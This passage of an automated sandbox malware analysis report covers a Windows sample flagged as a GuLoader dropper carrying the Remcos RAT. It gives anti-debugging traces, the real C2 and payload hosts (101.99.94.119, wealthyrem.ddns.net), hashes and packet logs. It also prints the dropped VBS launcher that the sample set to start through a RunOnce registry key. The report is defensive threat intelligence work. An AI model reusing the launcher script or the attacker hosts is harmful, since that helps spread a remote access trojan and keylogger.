      Source: C:\Users\user\Desktop\pRcHGlVekw.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02187EB3 rdtsc
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02186663 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02188817 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02187540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02183944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeCode function: 1_2_021855ED mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\pRcHGlVekw.exeProcess created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
      Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: logs.dat.16.drBinary or memory string: [ Program Manager ]
      Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder11Process Injection12Masquerading1Input Capture11Security Software Discovery521Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion22LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      pRcHGlVekw.exe17%ReversingLabsWin32.Trojan.Fragtor
      pRcHGlVekw.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe17%ReversingLabsWin32.Trojan.Fragtor

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw0%Avira URL Cloudsafe
      http://101.99.94.119/WEALTH_fkWglQyCXO188.bin0%Avira URL Cloudsafe
      http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.00%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wealthyrem.ddns.net
      194.5.97.128
      truetrue
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_fkWglQyCXO188.binkwtrue
        • Avira URL Cloud: safe
        unknown
        http://101.99.94.119/WEALTH_fkWglQyCXO188.bintrue
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        194.5.97.128
        wealthyrem.ddns.netNetherlands
        208476DANILENKODEtrue
        101.99.94.119
        unknownMalaysia
        45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

        Private

        IP
        192.168.2.1

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:458794
        Start date:03.08.2021
        Start time:18:58:35
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 12m 18s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:pRcHGlVekw.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Run name:Suspected Instruction Hammering Hide Perf
        Number of analysed new started processes analysed:41
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@3/3@175/3
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 25.8% (good quality ratio 6.7%)
        • Quality average: 12.9%
        • Quality standard deviation: 24.4%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
        • TCP Packets have been reduced to 100
        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 23.211.6.115, 168.61.161.212, 104.43.139.144, 23.211.4.86, 20.82.209.104, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.54.110.249, 20.190.160.134, 20.190.160.75, 20.190.160.8, 20.190.160.136, 20.190.160.4, 20.190.160.129, 20.190.160.132, 20.190.160.73, 93.184.220.29, 40.127.240.158, 51.104.136.2, 20.82.209.183
        • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458794/sample/pRcHGlVekw.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        19:00:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs
        19:00:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        194.5.97.128JXblq0dqPN.exeGet hashmaliciousBrowse
          Fec9qUX4at.exeGet hashmaliciousBrowse
            LzbZ4T1iV8.exeGet hashmaliciousBrowse
              kGSHiWbgq9.exeGet hashmaliciousBrowse
                loKmeabs9V.exeGet hashmaliciousBrowse
                  101.99.94.119JXblq0dqPN.exeGet hashmaliciousBrowse
                  • 101.99.94.119/WEALTH_fkWglQyCXO188.bin
                  Fec9qUX4at.exeGet hashmaliciousBrowse
                  • 101.99.94.119/WEALTH_fkWglQyCXO188.bin
                  LzbZ4T1iV8.exeGet hashmaliciousBrowse
                  • 101.99.94.119/WEALTH_PRUuqVZw139.bin
                  kGSHiWbgq9.exeGet hashmaliciousBrowse
                  • 101.99.94.119/WEALTH_PRUuqVZw139.bin
                  loKmeabs9V.exeGet hashmaliciousBrowse
                  • 101.99.94.119/WEALTH_PRUuqVZw139.bin

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  wealthyrem.ddns.netJXblq0dqPN.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  Fec9qUX4at.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  LzbZ4T1iV8.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  kGSHiWbgq9.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  loKmeabs9V.exeGet hashmaliciousBrowse
                  • 194.5.97.128

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYJXblq0dqPN.exeGet hashmaliciousBrowse
                  • 101.99.94.119
                  Fec9qUX4at.exeGet hashmaliciousBrowse
                  • 101.99.94.119
                  LzbZ4T1iV8.exeGet hashmaliciousBrowse
                  • 101.99.94.119
                  kGSHiWbgq9.exeGet hashmaliciousBrowse
                  • 101.99.94.119
                  loKmeabs9V.exeGet hashmaliciousBrowse
                  • 101.99.94.119
                  Audio #Ud83d#Udcde lifewire.org.HTMLGet hashmaliciousBrowse
                  • 111.90.141.176
                  bitratencrypt.exeGet hashmaliciousBrowse
                  • 111.90.149.108
                  svchost.exeGet hashmaliciousBrowse
                  • 111.90.149.108
                  eVF243bmXC.exeGet hashmaliciousBrowse
                  • 111.90.149.108
                  xSnF0lxFUX.exeGet hashmaliciousBrowse
                  • 111.90.146.149
                  QppmM7JmZd.exeGet hashmaliciousBrowse
                  • 111.90.146.149
                  vNiyRd4GcH.exeGet hashmaliciousBrowse
                  • 111.90.146.149
                  4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exeGet hashmaliciousBrowse
                  • 111.90.146.149
                  SecuriteInfo.com.Trojan.Win32.Save.a.2038.exeGet hashmaliciousBrowse
                  • 101.99.94.204
                  Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                  • 111.90.147.240
                  naxpJ9fFZ4.exeGet hashmaliciousBrowse
                  • 111.90.149.115
                  dMH1IIv1a1.exeGet hashmaliciousBrowse
                  • 111.90.149.115
                  bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
                  • 111.90.140.91
                  4cDyOofgzT.xlsmGet hashmaliciousBrowse
                  • 101.99.95.230
                  4cDyOofgzT.xlsmGet hashmaliciousBrowse
                  • 101.99.95.230
                  DANILENKODEjiYTQKf5gO.exeGet hashmaliciousBrowse
                  • 194.5.98.210
                  JXblq0dqPN.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  Global Wire Transfer.pdf.exeGet hashmaliciousBrowse
                  • 194.5.98.8
                  New Order PO#42617.exeGet hashmaliciousBrowse
                  • 194.5.98.7
                  KITCOFiberOptics_CompanyCertifcate.exeGet hashmaliciousBrowse
                  • 194.5.98.210
                  7keerHhHvn.exeGet hashmaliciousBrowse
                  • 194.5.98.74
                  Purchase.exeGet hashmaliciousBrowse
                  • 194.5.97.150
                  Fec9qUX4at.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  Ordonnance PL-PB39-210706,pdf.exeGet hashmaliciousBrowse
                  • 194.5.98.7
                  Tzcyxxestkakhuvtmvfdserywturrfjrye.exeGet hashmaliciousBrowse
                  • 194.5.98.72
                  LzbZ4T1iV8.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  kGSHiWbgq9.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  loKmeabs9V.exeGet hashmaliciousBrowse
                  • 194.5.97.128
                  1niECmfIcE.exeGet hashmaliciousBrowse
                  • 194.5.97.94
                  Nuzbcdoajgupgalxelbnohzzeonlplvuro.exeGet hashmaliciousBrowse
                  • 194.5.98.7
                  RueoUfi1MZ.exeGet hashmaliciousBrowse
                  • 194.5.98.3
                  Departamento de contadores Consejos de pago 0.exeGet hashmaliciousBrowse
                  • 194.5.98.7
                  04_extracted.exeGet hashmaliciousBrowse
                  • 194.5.97.18
                  scanorder01321.jarGet hashmaliciousBrowse
                  • 194.5.98.243
                  scanorder01321.jarGet hashmaliciousBrowse
                  • 194.5.98.243

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe
                  Process:C:\Users\user\Desktop\pRcHGlVekw.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):6.662154130313104
                  Encrypted:false
                  SSDEEP:1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
                  MD5:D2CB32F7C7F384B4BAA8DD13D6B5BBAB
                  SHA1:355ACB5AF5CAAEB59FD7C9E0A54B501C24D47919
                  SHA-256:2BD846BDDA945DC48A21C9BDA1497FEB9E67DF8CFB024CC8669041490C7C9A90
                  SHA-512:0D620354C0C94604A37277C2029832D4AFF586918821ED058F94FD0AB02817F7E9E48A4B53F221B0BB9617E9F5F349B0494E678694AC1D9053BB30F6B3766913
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 17%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@..................................q......................................TK..(....p...[..................................................................(... .......|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs
                  Process:C:\Users\user\Desktop\pRcHGlVekw.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):119
                  Entropy (8bit):5.104016732419952
                  Encrypted:false
                  SSDEEP:3:jfF+m8nhvF3mRDWXp5cViE2J5xAII1oyhgMHC:jFqhv9IWXp+N23fmhnC
                  MD5:FCA010003BC83A3D0D5FA585F5B62900
                  SHA1:2F0FEECD1CE61F34A74174844E09A5AA06FB748D
                  SHA-256:C0329C71251FD21B5E0060D8AA0ADB702848B6B88EF451D33C1A72CF6532F4DC
                  SHA-512:8FF45F3C8756EEC569C44DEB51D1F30D125C9735700EBE9885E7163884C350AC9C7C1F78BD930224F8E0FD45214F415CAEE0F55BA273C6500E9E31DF71DE1B10
                  Malicious:true
                  Reputation:low
                  Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe")
                  C:\Users\user\AppData\Roaming\remcos\logs.dat
                  Process:C:\Users\user\Desktop\pRcHGlVekw.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):148
                  Entropy (8bit):3.3396233491666556
                  Encrypted:false
                  SSDEEP:3:rklKlmuGlclNXWlfcl5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuGGafU5YcIeeDAlybW/G
                  MD5:11433C9F76522D182E47B45E4AD5FD05
                  SHA1:323674941D097ED5A15FBB6D3047240107922107
                  SHA-256:21F21F6860F7D09D401BC84C2117167B91F15A8D22398893A6D189384764C157
                  SHA-512:C157410A9FC604B8CB79B46006AADADCB0D2C55E955BB7E64A23C1C64B0DF0884FA68148313D63F669D1E0E3B6DA49A2ECD611775EACD122B0D81897D5B2AF25
                  Malicious:false
                  Reputation:low
                  Preview: ....[.2.0.2.1./.0.8./.0.3. .1.9.:.0.0.:.3.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.662154130313104
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:pRcHGlVekw.exe
                  File size:114688
                  MD5:d2cb32f7c7f384b4baa8dd13d6b5bbab
                  SHA1:355acb5af5caaeb59fd7c9e0a54b501c24d47919
                  SHA256:2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
                  SHA512:0d620354c0c94604a37277c2029832d4aff586918821ed058f94fd0ab02817f7e9e48a4b53f221b0bb9617e9f5f349b0494e678694ac1d9053bb30f6b3766913
                  SSDEEP:1536:MfPqE74qa95aAmpcPTDo9flG6kPl9NIcGCp9bZYuQmiPY/peaja9QNE7YP:Mf5sR94AWc7Do3G60lM49eM/ptO9QeE
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...IG.T.................@..........D........P....@................

                  File Icon

                  Icon Hash:6a4a266a2a3a2a2a

                  Static PE Info

                  General

                  Entrypoint:0x401144
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x54A54749 [Thu Jan 1 13:10:33 2015 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

                  Entrypoint Preview

                  Instruction
                  push 00406B3Ch
                  call 00007F4E1CCD0115h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  dec eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [esi-0Ah], bl
                  dec ecx
                  neg byte ptr [edi+ebx*2+16A34338h]
                  fisttp qword ptr [esi-28D14792h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [eax], eax
                  add byte ptr [eax], al
                  inc edx
                  add byte ptr [esi], al
                  push eax
                  add dword ptr [ecx], 53h
                  push esp
                  inc ebp
                  dec esi
                  push esp
                  dec edi
                  push edx
                  push ebx
                  push esp
                  inc ebp
                  dec ebp
                  dec ebp
                  inc ebp
                  push edx
                  dec esi
                  inc ebp
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  rcr byte ptr [ecx+03h], 00000000h
                  add byte ptr [eax], al
                  add bh, bh
                  int3
                  xor dword ptr [eax], eax
                  pop es
                  dec edx
                  or byte ptr [eax], ah
                  std
                  out 3Ah, al
                  inc edi
                  xchg byte ptr [edx+6Bh], bh
                  out dx, eax
                  in al, dx
                  inc esp
                  je 00007F4E1CCD0111h
                  pop edi
                  scasb
                  add byte ptr [ebp-57B79F5Ch], bh
                  lodsd
                  je 00007F4E1CCD015Ah
                  and esi, esp
                  push es
                  cmp cl, byte ptr [edi-53h]
                  xor ebx, dword ptr [ecx-48EE309Ah]
                  or al, 00h
                  stosb
                  add byte ptr [eax-2Dh], ah
                  xchg eax, ebx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  inc esi
                  pop ecx
                  add byte ptr [eax], al
                  pop eax
                  add byte ptr [eax], al
                  add byte ptr [ecx], cl
                  add byte ptr [esi+45h], al
                  push esp
                  dec ecx
                  push ebx
                  dec eax
                  dec ecx
                  push ebx
                  inc ebp
                  add byte ptr [00000001h], cl

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x14b540x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x5b8e.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x7c.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x13dd40x14000False0.651550292969data7.08042704515IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x150000x115c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x170000x5b8e0x6000False0.545694986979data6.03858270221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x1bce60xea8data
                  RT_ICON0x1b43e0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3641116991, next used block 3644398388
                  RT_ICON0x1aed60x568GLS_BINARY_LSB_FIRST
                  RT_ICON0x1892e0x25a8data
                  RT_ICON0x178860x10a8data
                  RT_ICON0x1741e0x468GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x173c40x5adata
                  RT_VERSION0x171e00x1e4dataChineseTaiwan

                  Imports

                  DLLImport
                  MSVBVM60.DLL_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

                  Version Infos

                  DescriptionData
                  Translation0x0404 0x04b0
                  ProductVersion1.00
                  InternalNameLIEGEMAN
                  FileVersion1.00
                  OriginalFilenameLIEGEMAN.exe
                  ProductNameKORPSENES

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  ChineseTaiwan

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 3, 2021 19:01:31.359549046 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.404753923 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.405019045 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.451824903 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.451909065 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.500464916 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.500549078 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.500612020 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.500654936 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.500718117 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.500751019 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.500755072 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.546262026 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546298027 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546320915 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546341896 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546359062 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546380997 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546401978 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546418905 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.546570063 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.546623945 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.546628952 CEST4973680192.168.2.3101.99.94.119
                  Aug 3, 2021 19:01:31.591965914 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.592009068 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.592027903 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.592047930 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.592072010 CEST8049736101.99.94.119192.168.2.3
                  Aug 3, 2021 19:01:31.592093945 CEST8049736101.99.94.119192.168.2.3
